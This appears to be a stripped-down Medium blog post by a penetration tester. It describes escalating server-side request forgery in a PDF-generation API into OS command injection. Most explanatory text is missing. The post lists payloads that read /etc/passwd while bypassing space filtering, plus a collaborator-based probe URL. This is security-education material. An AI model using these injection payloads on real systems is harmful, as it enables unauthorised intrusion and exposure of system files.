Web Application Penetration Testing

An unknown Linux secret that turned SSRF to OS Command injection

A weird approach to escalate the Server-Side Request Forgery

What is SSRF:

What is Command Injection:

Let’s discuss how I found the issue:

https://www.example.com/api/v03/create_pdf?url=http://testsite.com&cookies=a&server=web

Look for the collaborator interaction:

https://www.example.com/api/v03/create_pdf?url=http://<burp-collaborator-link>&cookies=a&server=web

Try inline command execution:

SSRF observation secureitmania
SSRF to OS command injection

The secret trick to bypass ‘space’

cat</etc/passwd
{cat,/etc/passwd}
cat$IFS/etc/passwd
cat${IFS}/etc/passwd
SSRF to OS command injection

https://www.buymeacoffee.com/secureitmania |blog.secureitmania.com| twitter @secureitmania |

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store